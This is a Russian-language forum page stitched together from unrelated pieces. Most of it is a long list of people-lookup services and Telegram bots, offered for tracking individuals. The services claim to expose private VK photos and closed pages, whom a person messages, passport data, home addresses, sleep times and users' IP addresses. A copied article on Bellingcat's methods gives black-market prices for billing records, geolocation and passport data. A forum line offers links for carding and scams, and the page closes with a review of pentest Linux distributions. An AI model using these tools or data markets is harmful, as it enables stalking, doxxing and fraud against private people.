[~]vkdia.com — Определит с кем из друзей переписывается человек
[~]searchlikes.ru — Найдет где есть лайки и комментарии, дает статистику
друзей
[~]tutnaidut.com — информация о аккаунте за несколько лет назад
[~]flightradar24.com - база данных о полетах по всему миру
[~]vkbarkov.com - пробив страницы ВКонтакте
[~]anonymousmask.com - сайт для взлома
[~]@bagosi - бот вк
[~] Archive.org - просмотр удаленой информации
[~]Archive.is - просмотр сохраненой информации в интернете
[~]VAK-SMS.COM - сайт с виртуальнвми номерами
[~]5sim.net - сайт с виртуальными номерами
[~]7sim.net - сайт с виртуальными номерами
Короткий URL для всех!
http://РЕКЛАМА.ru
▫ Locatefamily
(https://www.locatefamily.com/) — найдет ▫ Infobel
(https://www.infobel.com/fr/world) — найдет номер телефона, адрес и ФИО
▫ Rocketreach (http://rocketreach.co/) — поиск людей в linkedIn, Facebook и на
других сайтах, находит email
▫ https://t.me/@egrul_bot — найдет ИП и компании
▫ Яндекс.Люди (https://yandex.ru/people) — поиск по социальным сетям
▫ реестр залогов (https://www.reestr-zalogov.ru/state/index) — поиск по
залогодателям, даст паспортные данные, место и дату рождения и т.д.
▫ Zytely (https://zytely.rosfirm.info/) — найдет адрес прописки и дату
рождения, необходимо знать город
▫ Mmnt (http://mmnt.ru/) — найдет упоминания в документах
▫ Kad.arbitr.ru (http://kad.arbitr.ru/) — дела, рассматриваемые арбитражными
судами
▫ Fedresurs (http://bankrot.fedresurs.ru/?attempt=1) — поиск по банкротам,
можно узнать ИНН, СНИЛС и адрес
▫ Sudact (https://sudact.ru/) — судебные и нормативные акты РФ, поиск по
участникам и судам
▫ Fssprus (http://fssprus.ru/iss/ip/) — проверка задолженностей, для физ. лица
▫ Notariat (https://data.notariat.ru/directory/succession/search?..) — поиск в
реестре наследственных дел, найдет дату смерти человека и адрес нотариуса
оформившее дел
(https://account.lampyre.io/email-and-phone-lookup) — веб версия поиска по
любому номеру телефона, поиск по аккаунтам и тел
Регистратор доменных имён РЕГ.РУ
www.reg.ru
ефонной книге
▫ Getcontact (https://getcontact.com/) — найдет информацию о том как записан
номер в контактах
▫ Truecaller (ht
[Ссылка]
Locate Family | Find people for FREE!
https://www.locatefamily.com/
tps://www.truecaller.com/) — телефонная книга, найдет имя и оператора телефона
▫ Bullshit (https://mirror.bullshit.agency/) — поиск объявлений по номеру
телефона
▫ Bases-brothers (https://bases-brothers.ru/) — поиск номера в объявлениях
▫ Microsoft (http://account.live.com/) — проверка привязанности номера к
microsoft аккаунту
▫ Avinfo.guru (https://avinfo.guru/) — проверка телефона владельца авто,
иногда нужен VPN
▫ Telefon.stop-list (http://telefon.stop-list.info/) — поиск по всем фронтам,
иногда нет информации
▫ @numberPhoneBot (https://t.me/@numberPhoneBot) — найдет адрес и ФИО, не
всегда находит
▫ Rosfirm (https://gutelu.rosfirm.info/) — найдет ФИО, адрес прописки и дату
рождения, нужно знать город
3wifi (https://3wifi.stascorp.com/map) — найдет wifi точки с паролями
Wigle (https://wigle.net/) — покажет SSID и BSSID Wi-Fi точки
Osintcombine (http://osintcombine.com/) — найдет Facebook страницы организаций
Trendsmap (https://www.trendsmap.com/) — карта трендов в Twitter
Omnisci (https://www.omnisci.com/demos/tweetmap) — покажет твитты на карте
Mattw (https://mattw.io/youtube-geofind/location) — находит видео на YouTube
@suncalc_bot (https://t.me/suncalc_bot) — расчет времени закатов, рассветов,
сумерек
Rosreestr
(https://rosreestr.ru/wps/portal/p/cc_ib_portal_services/online_request) —
справочная информация по объектам недвижимости
Address.stop-list (http://address.stop-list.info/) — проверка на залог
недвижимости или ипотеку, кадастровая стоимость объекта, судебные дела
Nomer.center (https://nomer.center/) — телефонный справочник, иногда нужен VPN
Zytely (https://zytely.rosfirm.info/m/) — найдет всех жителей их ФИО и дату
рождения
Photo map (http://photo-map.ru/) — найдет фото из VK, радиус поиска от 10
метров
Azurewebsites (http://snradar.azurewebsites.net/) — найдет фото из VK, радиус
поиска от 10 метров, фильтры дат
Gosuslugi (https://dom.gosuslugi.ru/#!/houses) — даст паспорт здания
Kamerka (https://github.com/woj-ciech/kamerka) — найдет на карте камеры,
устройства интернета вещей, принтеры, твиты, Instagram фото, flickr и другие
открытые устройства
Mattw (https://mattw.io/youtube-geofind/location) — находит видео на YouTube
MAC адрес
└ Для MAC адреса
Содержимое раздела:
Xinit (https://xinit.ru/wifi/) — покажет местоположение Wi-Fi
Alexell (https://alexell.ru/network/mac-geo/) — тоже покажет местоположение
IP адрес
└ Для IP адреса
Содержимое раздела:
HostHunter (https://github.com/SpiderLabs/HostHunter) — обнаружение и
извлечение имен хостов из набора целевых IP-адресов
Censys (http://censys.io/) — находит какие серверы и устройства выставлены в
сети
Cyber-hub (https://cyber-hub.pw/ip2skype.php) — найдет Skype аккаунт
Spiderfoot (https://www.spiderfoot.net/) — автоматический поиск с
использованием огромного количества методов, ножно использовать в облаке если
пройти регистрацию
Iknowwhatyoudownload (http://iknowwhatyoudownload.com/) — покажет что
скачивают в интернете
Secapps (https://recon.secapps.com/) — автоматический поиск и создание карт
взаимосвязей
Dnslytics (https://dnslytics.com/reverse-ip) — найдет домены
Yuleak (https://yuleak.com/) — найдет серверы, домены, поддомены, услуги,
darkweb, пароли, уязвимости, идентификаторы и многое другое
Вконтакте
Содержимое раздела:
Searchlikes.ru (https://searchlikes.ru/) — найдет где есть лайки и
комментарии, дает статистику друзей
Tutnaidut (http://tutnaidut.com/) — информация аккаунта несколько лет назад
220vk (https://220vk.com/) — определит средний возраст друзей, скрытых друзей,
города друзей, дата регистрации и т.д
@VKUserInfo_bot (https://t.me/VKUserInfo_bot) — бот скачивает всю информацию
об аккаунте
City4me.com (http://vk5.city4me.com/) — Cтатистика онлайн активности, скрытые
друзья
Spys (http://spys.one/vk) — просмотр закрытой страницы
Vk.watch (https://vk.watch/) — покажет историю аккаунта с 2016 года,
ограниченная информация, покажет фото в низком качестве, можно уменьшить
масштаб фото, тем самым распознать что там изображено
Vk-photo (https://vk-photo.xyz/) — частные фото аккаунта
VKAnalysis (https://github.com/migalin/VKAnalysis) — анализ круга общения,
текста, фото, онлайна и интересов аккаунта
Vk-express.ru (http://vk-express.ru/) — слежка за аккаунтом, после добавления
будут доступны аватары, лайки, комментарии, друзья группы и т.д.
Archive (https://archive.org/) — покажет архивированную версию аккаунта
VKinfo (https://vk.com/app7183114) — найдет созданные группы, упоминания в
комментариях, созданные приложения и комментарии к фото
Yasiv.com/vk (http://yasiv.com/vk) — создает граф из друзей аккаунта, после
регистрации добавьте в граф аккаунт того кого хотите просмотреть
Archive.is (http://archive.is/) — архивированная страница аккаунта
@InfoVkUser_bot (https://t.me/InfoVkUser_bot) — бот покажет наиболее частые
места учебы друзей аккаунта
@FindNameVk_bot (https://t.me/FindNameVk_bot) — история изменений имени
аккаунта
Yzad (http://yzad.ru/) — находит владельца группы
Vkdia.com (https://vkdia.com/) — определит с кем из друзей переписывается
человек
YouTube
Содержимое раздела:
Keyhole.co (https://keyhole.co/) — анализ аккаунта, при регистрации нет
проверок по email и телефону, вводите любые данные, 7 дней бесплатно
Archive (https://archive.org/) — покажет архивированную версию аккаунта
Instagram
Содержимое раздела:
Gramfly.com (http://gramfly.com/) — Gramfly.com
Storiesig.com (https://storiesig.com/) — сохранённые истории
Codeofaninja.com (https://codeofaninja.com/) — определит ID аккаунта
Bigsta.net (https://bigsta.net/) — аналитика аккаунта
Keyhole.co (http://keyhole.co/) — анализ аккаунта, при регистрации нет
проверок по email и телефону, вводите любые данные, 7 дней бесплатно
Archive.org (https://archive.org/) — покажет архивированную версию аккаунта
@InstaBot (https://t.me/InstaBot) — скачивает сторис аккаунта
@usersbox_bot (https://t.me/usersbox_bot) — бот найдет аккаунты в ВК у которых
в поле instagram указан искомый логин, введите в боте
Steam
Содержимое раздела:
Cyber-hub.net — инструмент, который позволяет вам получить IP пользователя в
реальном времени или из базы данных с сохраненными результатами
Archive (https://archive.org/) — покажет архивированную версию аккаунта
Socid extractor (https://github.com/soxoj/socid_extractor) — найдет Steam ID,
даже скрытого аккаунта
Steamid.uk (http://steamid.uk/) — поиск по Steam ID, логину, Steam3, Community
ID, найдет историю ников, дату создания, историю аватаров, статистику друзей
Facebook
Содержимое раздела:
Graph.tips (https://graph.tips/beta/) — дает возможность просматривать, каким
публикациям ставил лайки пользователь
Whopostedwhat (https://whopostedwhat.com/) — найдет посты в Facebook
Fb-sleep-stats (https://github.com/sqren/fb-sleep-stats) — отслеживает онлайн
/ оффлайн статус людей, можно получить точную информацию о времени их сна
Lookup-id (https://lookup-id.com/) — покажет ID аккаунта
Keyhole (https://keyhole.co/) — анализ аккаунта, при регистрации нет проверок
по email и телефону, вводите любые данные, 7 дней бесплатно
Archive (https://archive.org/) — покажет архивированную версию аккаунта
Usersbox_bot (https://t.me/usersbox_bot) — бот найдет аккаунты в ВК у которых
в поле facebook указан искомый логин, введите в боте
Skype
Содержимое раздела:
Mostwantedhf.info (https://mostwantedhf.info/) — найдет почту
Resolvethem.com (http://resolvethem.com/) — найдет IP
Webresolver (https://webresolver.nl/) — найдет IP
@usersbox_bot (https://t.me/@usersbox_bot) — бот найдет аккаунты в ВК у
которых в поле skype указан искомый логин, введите в боте
Telegram
источник статьи, скопипастил оттуда
https://habr.com/ru/company/vdsina/blog/535688/
интересно, почитайте
как раз в тему, недавно stepany4 писал о методах работы
Bellingcat
Весь мир обсуждает последнее расследование детективного агентства Bellingcat. Кажется невероятным, что [группа обычных пользователей](https://meduza.io/feature/2015/02/24/oruzhie-massovogo- obnaruzheniya) способна распутать такое дело. При этом они используют стандартные инструменты и базы данных, зачастую доступные в интернете.
Неужели сегодня можно раскрыть преступление вообще не вставая из-за компьютера? Только на основании следов, которые люди оставляют в базах данных, в истории мессенджеров, в логах операторов связи, на камерах наблюдения?
Или это фантастический киберпанк?
На Хабре уже писали, как специалисты Bellingcat использовали обратный поиск изображений на «Яндексе» — действительно, уникальный инструментарий с использованием машинного обучения. Google с некоторого времени прикрыл данную функциональность в поиске картинок. Возможно, скоро и «Яндекс» закроет эту функцию в публичной версии (по крайней мере, некоторые читатели в комментариях к статье предполагают такой вариант). Так или иначе, но Bellingcat вдобавок к этому использует и много других инструментов.
Рынок купли/продажи персональной информации довольно спокойно жил несколько лет, пока не случилось это расследование. После него резко выросли цены, а некоторые посредники вообще бесследно исчезли. По мнению экспертов, ситуация должна восстановиться к марту 2021 году.
Итак, давайте изучим по шагам расследование Bellingcat. Оно начинается с пробива по базе звонков.
После прошлого расследования у Bellingcat был список сотрудников, которые работали с химоружием за границей, и их телефонных номеров. Следователи предположили, что для операции внутри РФ будут использоваться другие кадры, поскольку эти кадры уже «спалились» в публичном расследовании. Однако пробив старых агентов показал, что один из них созванивался со специалистом по химоружию из Пятигорского института Минобороны через несколько часов после отравления. Это было их единственный разговор на протяжении шести месяцев. Следователи предположили, что профессионалы могли обсуждать какое-то интересное для них событие.
Затем следователи изучали несколько других ниточек, в том числе подробно проверяли личности всех, с кем разговаривал по телефону руководитель научного центра «Сигнал», где разрабатываются вещества. Оказалось, что 6 июля 2020 года он очень плотно общался с разными сотрудниками ФСБ, которые раньше не попадали в поле зрения Bellingcat. Если раньше руководитель «Сигнала» общался с ФСБ раз в месяц, то теперь за один день состоялось 15-20 звонков.
Детализацию биллинга продают, в том числе, сотрудники операторов мобильной связи. Детализация звонков и SMS по конкретному номеру стоит 20 тыс. руб. за первый месяц и 7000 руб. за каждый следующий, скидка до 50% при заказе от 5 абонентов. Геолокация по номерам телефонов — 110 тыс. руб. за телефон в месяц.
В биллингах на каждый звонок или подключение к интернету указана конкретные базовые станции, к которым телефон привязан в данный момент. Триангуляцию следователи выполняют иногда вручную в графическом редакторе. Затем из точек триангуляции составляется тепловая карта — она показывает, где человек бывает чаще всего. Обычно это дом и работа.
Детализация биллинга выявила много интересного, в том числе один из каналов связи фсбшников — WhatsApp, что довольно неожиданно.
После провала этой операции можно предположить, что ФСБ будет жёстче следить за операторами и серьёзнее наказывать за утечки. Поскольку риски возрастают, цены на услуги в ближайшее время тоже будут расти.
Дальше расследование раскручивалось по цепочке: теперь уже проверялись все звонки каждого из сотрудника, выявленных на предыдущем этапе. Так определилась группа из шести номеров, которые часто общаются между собой.
Пробивка абонента по номеру телефона стоит 1000 руб. Здесь выделяются интересующие персонажи — агенты, химики, специалисты, которые тоже участвовали в операции.
Место работы проверяется в приложении GetContact (запись контакта в адресной книге телефона) или другой слитой на чёрный рынок базе данных. В Bellingcat используют в том числе коллекцию баз данных Larix, включающую в себя сведения о кредитной истории, трудоустройстве, судимостях и перелётах.
«Мы все купленные биллинги загружаем просто в базу MySQL — и потом по ней уже можно делать конкретный запрос. Узнать, например, какой номер чаще всего созванивается с другим» — [рассказывал](https://meduza.io/feature/2020/12/16/ne-tak-to-prosto-otravit- cheloveka-novichkom) главный расследователь Bellingcat Христо Грозев.
На следующем этапе следователи проверили авиаперелёты каждого сотрудника в этой группе из шести человек.
Узнать попутчиков/пассажиров рейса на чёрном рынке сейчас стоит 15 000 руб. за рейс.
Здесь тоже обнаружилась корреляция.
Информацию по авиаперелётам каждого гражданина можно найти в базах от авиакомпаний. Некоторые из них слиты уже давно. По этим базам нашлось 37 совпадений.
Грозев говорил, что сначала базы пробивали всплепую, но потом стали выбирать их более целенаправленно.
Перелёты и поездки человека за один год пробиваются по базе МВД «Магистраль» за 2000 руб.
Базы с железнодорожными и авиабилетами вплоть с 2017 по 2019 годы уже разошлись по интернету. Они есть почти у всех. Благодаря пакету Яровой теперь данные продают за три года, а не за шесть месяцев, как раньше.
В этих расследованиях гораздо сложнее достать актуальную информацию по сегодняшним/вчерашним рейсам, тогда как архивные данные лежат практически в открытом доступе.
Следователи Bellingcat собрали информацию на каждого из шести членов группы. Услуга «Роспаспорт» (данные паспорта, загранпаспорта, адресов регистрации, фото владельца) стоит всего 1400 руб. с человека, за 11 человек со скидкой с могли взять 10 тыс.
Места парковок и поездки из базы «Поток» (движение и остановки по камерам города) стоят 2500 руб. за авто за первый месяц и 1500 руб. за следующие.
Кроме подпольных сервисов пробива, очень много информации лежит просто в открытом доступе. Когда на рынке появляется новая БД, то она дорого стоит только в первый год или два, а затем сливается по всем каналам.
На специализированных форумах можно найти практически любые приватные данные о любом человеке. Например, вот актуальные цены у одного из продавцов:
Банковская категория с пробивом физ- и юрлиц — одна из самых популярных на форумах. Информацию «сливают» сотрудники самих банков, которые могут посмотреть информацию по любому счёту.
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2F5a%2Ffx%2Fo-%2F5afxo- tvdujbatwncw0-55mrrwy.jpeg&hash=091fabd6629109ea41274dd83837d04d)
Bellingcat несколько лет отслеживает разнообразные источники информации в открытом доступе и собирает их. Собственно, такое же хобби есть у многих читателей подпольных форумов и телеграм-каналов со сливами данных. Удобнее провести поиск по своим базам, чем запускать платный пробив по коммерческим сервисам вроде всем известного телеграм-бота «Глаз бога», у которого в России более 200 тыс. пользователей.
Платформа «Глаз блога» объединяет более 40 источников информации. Один запрос
на расширенный поиск через телеграм-бота стоит 30 рублей
Активисты Bellingcat собрали большое количество таких баз. В наше время подобным занимаются все, кто интересуется исследовательской журналистикой с цифровой криминалистикой в интернете (forensic investigations).
Цифровая криминалистика — одна из новых профессий 21 века. Сейчас практически любой человек оставляет за собой яркий цифровой след, который с каждым годом становится всё более жирным. Мало аспектов нашей жизни не регистрируется цифровыми устройствами, поэтому цифровая криминалистика становится настолько мощным инструментом.
Многие преступления можно расследовать и раскрыть не вставая из-за компьютера.
Некоторые инструменты и базы данных свободно доступны через интернет и бесплатны, как [база патентов Федеральной службы по интеллектуальной собственности](https://new.fips.ru/elektronnye-servisy/informatsionno- poiskovaya-sistema/informatsionnye-resursy-.php):
Гражданская журналистика, которая расследует государственный терроризм и преступления правительств разных стран — главная заноза для тоталитарных политических режимов. Это краудсорсинг в самом прямом смысле: когда сетевой разум решает такие головоломки, которые не могут осилить целые разведывательные службы отдельных государств.
Или это настоящие спецслужбы используют сетевой разум в своих целях, как раньше хакеры сливали украденные документы в Wikileaks, чтобы анонимно опорочить противника? Границы настолько размылись, что чётко отделить гражданскую журналистику от деятельности спецслужб становится сложно.
Нужно отметить, что массовые проблемы с утечкой персональных данных граждан присущи не только России. Например, в Индии тоже торгуют такими базами налево и направо.
В принципе, тут нет ничего нового.
В России такие базы начали продавать на компакт-дисках ещё в 90-е годы. Около десяти лет назад были популярны сервисы пробива Radarix.com и RusLeaks.com , которые были вскоре закрыты. На их место пришли другие, а в даркнете подобные сервисы довольно хорошо известны. В последние годы отрасль вышла на принципиально новый уровень, поскольку количество баз данных сильно увеличилось. На рынке действуют даже специальные «гаранты сделок», посредники, которые защищают клиентов (покупателей информации) от мошенников.
По мнению специалистов, бороться со сливом персональных данных в открытый доступ практически невозможно. Этих данных становится всё больше, так же как источников информации.
Перспективные сервисы и услуги, которые могут появиться в ближайшие годы:
В общем, это действительно интересные новые возможности для разведки, шпионажа, а также краудсорсинга и гражданской журналистики.
Интересный парадокс. Благодаря системе тотальной слежки за гражданами сами граждане получают возможность следить за агентами спецслужб. Bellingcat — одна из первых организаций, которая этим занимается, но явно не последняя.
Есть полезные ссылки не только по пробиву но и для каржа , скама и прочего
You must have at least 20 reaction(s) to view the content.
Собирать свою коллекцию хакерских тулз — это отлично, но теперь принято брать за основу один из специализированных дистрибутивов. Обычно это Kali, но мы рассмотрим не только его, но и другие дистры для пентеста, подчас не менее эффективные, а в каких-то областях и более полезные.
Дистрибутивов для пентеста множество. Одни популярны, другие — не очень, но все они преследуют цель дать хакеру удобный и надежный инструмент на все случаи жизни. Большинством из программ в составе таких кастомизированных сборок средний хакер никогда не воспользуется, но для ~~понтов~~ статусности их добавляют («Смотри, у тебя 150 утилит, а у меня — 12 000!»). Сегодня мы постараемся сделать обзор большинства интересных дистрибутивов, как популярных, так и незаслуженно забытых. Если же мы что-то упустили — не стесняйся использовать комментарии. Поехали!
NST
Начнем с малоизвестного, но оттого не менее интересного дистрибутива. NST (Network Security Toolkit) основан на Fedora и предназначен для сетевых атак. В основе интерфейса — MATE, который вызывает ощущение начала нулевых. В комплекте идет несколько десятков самых важных инструментов, в основном сетевые сканеры, клиенты для всевозможных служб и разного рода перехватчики трафика. Но не хватает таких полезностей, как, например, masscan , и даже банального aircrack , хотя airsnort имеется.
![Основная часть софта лежит в папке
Internet](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2Fa26ed291b876543a8dd98e83264a5785%2F13984%2Fnstappsfolder.jpg&hash=c096902d81eb3136fe660aace4da9979)
Основная часть софта лежит в папке Internet
Больше всего вкусностей можно найти в папке Applications → Internet. Тут у нас и Angry IP Scanner , написанный, кстати, на Java, и Ettercap , и даже OWASP ZAP , о котором мы [уже писали](https://xakep.ru/2020/04/21/hack- scan/) в «Хакере». Есть неплохой сборник модулей для всевозможного спуфинга и скана у пакета netwag. В деле он показал себя неплохо, жаль только, не очень удобен и жутко устарел.
Весь проверенный мной софт работает прекрасно. В общем, всем скучающим по древнему интерфейсу и привычным инструментам рекомендуется.
Kali
Как ты, конечно, знаешь, Kali — один из самых распиаренных дистрибутивов для хакеров, и было бы странно, если бы мы про него не написали. О нем знают даже школьники, а с относительно недавних пор он доступен в виде приложения прямо из Microsoft Store! Конечно, доступность — несомненный плюс, но система слегка перегружена набором инструментов (хотя и не так сильно, как BlackArch), к тому же часть из них из коробки работает криво или не работает вообще.
Защиты от дурака в Kali тоже не предусмотрено. Как показывает практика, не всем пользователям понятно, что не стоит делать эту систему основной. От ядра до оболочки она была создана и оптимизирована для выполнения боевых задач на фронтах ИБ и плохо пригодна для спокойной ежедневной работы. Многие нужные в быту механизмы там попросту отсутствуют, а попытка их установить, скорее всего, вызовет сбои в нормальной работе ОС, если не выведет ее из строя полностью.
Короче, Kali как спички — мощная штука в умелых руках, ее легко достать, но детям лучше не давать. Охватить разом все возможные официальные и неофициальные утилиты (а их, на минуточку, больше 600) этой системы не представляется возможным хотя бы потому, что постоянно появляются новые и новые модули, фреймворки, утилиты и прочие прибамбасы.
Kali предназначена для широкого спектра задач, но основная из них — атаки в сетевой среде, например, поиск уязвимостей в веб-приложениях и получение доступа к беспроводным сетям. Как наследник BackTrack, Kali вообще неплохо приспособлена для работы с беспроводными каналами связи, в особенности Wi-Fi. Проверка на прочность удаленных хостов тоже возможна с помощью, например, Metasploit (подробнее о нем — в нашем недавнем обзоре), но именно на работу с Wi-Fi ориентировано ядро и значительная часть инструментов.
Еще из плюсов отмечу наличие в штатной поставке большого количества словарей для различных атак, не только на Wi-Fi, но и на аккаунты в интернете и на сетевые службы.
![Kali работает в WSL](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2Fa26ed291b876543a8dd98e83264a5785%2F13980%2Fwslkalinf.jpg&hash=1d7ac1599043a6f72aa792ab69de1ad9)
Kali работает в WSL
Для еще большего удобства использования на официальном сайте предлагается версия дистрибутива для виртуальных машин, ведь при взломе куда разумнее использовать систему без установки — мало ли кто потом будет копаться в твоем компе!
Вердикт такой: если умеешь пользоваться — классная штука, но не вздумай показывать ее ребенку. Один из авторов видел, что будет, если нарушить это указание.
DEFT
![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2Fa26ed291b876543a8dd98e83264a5785%2F13986%2Fdeftdesktop.jpg&hash=e86daf3307db159e1bc13701d65b4d97)
Родина DEFT — солнечная Италия, и он щедро, как пицца сыром, посыпан
разнообразными инструментами для разведки и взлома. При этом они не примотаны
к дистрибутиву синей изолентой, а вполне гармонично встроены в него. Все
вместе напоминает интересный и полезный в жизни швейцарский нож.
Разработан DEFT на платформе Lubuntu и снабжен удобным графическим интерфейсом. В продукт входит набор профильных утилит, начиная с антивирусов, систем поиска информации в кеше браузера, сетевых сканеров и других полезностей и заканчивая инструментами, которые необходимы при поиске скрытой информации на диске.
Используя эту ОС, не составит труда получить доступ к стертым, зашифрованным или поврежденным данным на различных видах физических носителей.
Основной инструментарий прячется в разделе DEFT, который, в свою очередь, находится в некотором подобии меню «Пуск».
![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2Fa26ed291b876543a8dd98e83264a5785%2F13985%2Fdefttools.jpg&hash=f4e67a48ef2119439f00198fefdc2041)
Изначально этот дистрибутив был предназначен для нужд сетевой полиции и
специалистов по реагированию на инциденты в области ИБ, поэтому еще одна
сильная сторона DEFT — это конкурентная разведка, в том числе анализ
взаимосвязей аккаунтов соцсетей.
Есть даже интересная утилита для обнаружения геолокации заданного аккаунта LinkedIn или Twitter. Я не смог проверить, насколько эффективно это работает в данный момент, но с определением принадлежности аккаунта к стране и городу она справляется.
В отличие от Kali Linux или Tsurugi, в DEFT защита от дурака встроена. Без должной подготовки почти ни один инструмент попросту не запустить, а без глубокого понимания работы защитных механизмов тут вообще делать нечего.
Буквально каждое приложение или опция требует прав root, так что не спеши сразу запускать все подряд или создавать непривилегированного пользователя.
Также я обнаружил «подарочек»: несколько репозиториев, откуда DEFT берет обновы, закрыты ключами. Пару дней я рылся по форумам, пока не нашел, откуда запросить данные, да и сами ключи тоже нашлись.
В итоге эта система хороша для форензики и расследования инцидентов, в особенности если есть физический доступ к носителям информации — будь то диск, флешка или смартфон (хакера, начальника, сотрудника, конкурента, жены, любовницы, ее бати — нужное подчеркнуть).
Tsurugi
Этот дистрибутив вообще не очень известен в кругах ИБ-специалистов — возможно, из-за своей молодости. Однако Tsurugi — детище, рожденное совместными усилиями создателей DEFT и Kali. Что из этого вышло? Давай посмотрим!
Tsurugi (это слово означает двуручный японский меч) создан на основе Ubuntu, в качестве GUI используется MATE. Предназначен он больше для форензики или OSINT, нежели для пентеста, однако его инструментарий, как и некоторые особенности, позволяют использовать его и в этом направлении. Изначально система поставляется в режиме live-образа, но при желании можно произвести постоянную установку.
![Стандартный рабочий стол](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2Fa26ed291b876543a8dd98e83264a5785%2F13981%2Ftsrdesktop.jpg&hash=7bd2e2a48b8dca96e8738ef1e5de0b38)
Стандартный рабочий стол
Войдя в систему, видим несложный GUI, предусмотрительно обвешанный со всех сторон виджетами показателей загрузки процессора, жестких дисков, оперативной памяти, скорости сети и прочего.
Да, рука создателей Kali тут довольно сильно заметна. В глаза сразу бросается обилие предустановленных инструментов, которые нужны далеко не всегда. При этом интерфейс системы выглядит более чем минималистично и компактно. А вот логика работы системы безопасности, как и работы с вебом или защиты от отслеживания, основана на лучших практиках DEFT.
Весь основной арсенал расположен в Applications → TSURUGI.
![Меню Tsurugi](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2Fa26ed291b876543a8dd98e83264a5785%2F13991%2Fapptsr.jpg&hash=870121b5340199910c878e2c5da9b54b)
Меню Tsurugi
Здесь и работа с образами, и анализ вредоносов, и восстановление данных, и, как упоминалось, набор утилит для OSINT.
Стоит иметь в виду, что эта ОС, как и Kali, не имеет защиты от кривых рук. Она подойдет тем, кто имеет хорошие навыки работы с Linux и действует предусмотрительно и вдумчиво. Как и положено острому японскому мечу!
Обширный инструментарий позволяет использовать систему как мультитул для широкого спектра задач. Пусть Tsurugi и немного смахивает на Kali, серьезные различия все равно имеются. При том что некоторые из утилит так же, как и в Kali, работают некорректно или не работают вообще, процент проблемных тулз здесь намного меньше, и видно, что об этом кто-то заботится.
Если по каким-то причинам ты не хочешь использовать Kali, то Tsurugi станет достойным инструментом в твоем наборе. Пять звезд не поставим как минимум потому, что один из авторов этого обзора отложил кирпич от звука меча при старте ОС… Впрочем, давай не будем о грустном.
Parrot
![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2Fa26ed291b876543a8dd98e83264a5785%2F13982%2Fparrotos.jpg&hash=0e950bc3b0a1ce82ddacde3adaa10963)
Этот красивый дистрибутив Linux основан на Debian и разработан командой
Frozenbox специально для тестов безопасности компьютерных систем, поиска и
оценки различного ряда уязвимостей.
Что же внутри? В качестве окружения рабочего стола здесь все тот же MATE. Опыт использования (субъективно) приятный.
![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2Fa26ed291b876543a8dd98e83264a5785%2F13983%2Fparrotappsfolder.jpg&hash=776d5bf99a239195a4a7b66f554d456b)
Сверху, в разделе Application, ты найдешь утилиту Anon Surf. Одна из
особенностей Parrot — в ней предустановлены некоторые средства анонимизации, и
при выборе Anonsurf Start весь трафик системы будет перенаправлен через Tor. В
этом же разделе есть возможность использовать DNS проекта OpenNIC — это
вненациональная альтернатива реестрам доменов верхнего уровня. Здесь же,
выбрав параметр Check IP, можно проверить текущий внешний IP.
Второй раздел — Cryptography. Здесь стоит обратить внимание на утилиту GPA — это графический интерфейс программы GnuPG , предназначенной для шифрования информации и создания электронных цифровых подписей. Это, по сути, альтернатива шифрованию PGP. А если тебе нужен GPG, то под рукой будет утилита zuluCrypt — аналог VeraCrypt, который позволяет шифровать папки, разделы, флешки и прочее.
Следующий (и самый интересный) раздел — Parrot. В нем собраны именно те утилиты для тестирования защищенности компьютерных систем, из-за которых эта ОС попала в наш обзор. Многие из представленных утилит нам уже известны по Kali Linux, но есть и уникальные.
Подробнее хотелось бы остановиться на вкладке «Интернет». Здесь мы видим предустановленный Tor Browser и биткойн-кошелек Electrum , а также утилиту XSSer — фреймворк для обнаружения и эксплуатации XSS-уязвимостей в веб-приложениях. Тут же есть почтовый клиент Claws Mail , это полноценный почтовый клиент с поддержкой шифрования GPG. Бонусом идет Ricochet IM — децентрализованный анонимный мессенджер, работающий через сеть Tor.
Это, пожалуй, все особенности Parrot Security OS, о которых хотелось бы рассказать. Как видно, Parrot OS подходит не только для тестов на проникновение, она может и служить ОС для ежедневного использования тем, кто знает, зачем им это нужно.
Нам Parrot показалась качественно и удобно сделанной ОС. Приятно работать с системой, где не нужно предварительно починять инструменты.
BlackArch
BlackArch — самый крупный по объему образа дистрибутив. Актуальная версия занимает больше 14 Гбайт! Загружать, кстати, при желании можно через торрент, и сидов всегда много.
Оцени дружелюбие интерфейса: если тебе удалось выкачать этого монстра и запустить его, нужно ввести логин и пароль, о которых ты должен прочесть на сайте в инструкции по установке (это root/blackarch, если что). Про live- пользователей, видимо, забыли.
Дальше: после логина не видно никаких намеков на меню или что-то в этом роде. Перед нами практически голый Fluxbox, поэтому оно вызывается по клику правой кнопкой мыши в любом месте рабочего стола.
![Группы приложений BlackArch](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2Fa26ed291b876543a8dd98e83264a5785%2F13990%2Fbacategories.jpg&hash=4146e805c7e309a52a25f7ea67587981)
Группы приложений BlackArch
Все приложения удобно разложены по категориям в подменю blackarch основного меню. Представлены 49 категорий, в которых есть инструменты на любой случай жизни. Навигация по меню с помощью мыши, как в Windows? О нет, в этом дистрибутиве про мышь смело можно забыть. Только клавиатура, только хардкор! С другой стороны, раз ты решил связаться с *nix-системами и взломом, глупо рассчитывать на что-то другое.
Что касается собственно инструментов, то тут представлены все популярные и не очень тулзы для взлома, включая, конечно, такие знаковые, как Metasploit и BeEF XSS. Делать обзор всех инструментов этого поистине огромного набора — занятие еще более безнадежное, чем в случае с Kali и Parrot. Так что я пройдусь по верхам, а ты, если будет интересно, сможешь углубиться в чтение документации настолько, насколько посчитаешь нужным.
![Wine атакует!](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2Fa26ed291b876543a8dd98e83264a5785%2F13989%2Fbawineattack.jpg&hash=c32c88ea8d1264975393eeb3ed8603d3)
Wine атакует!
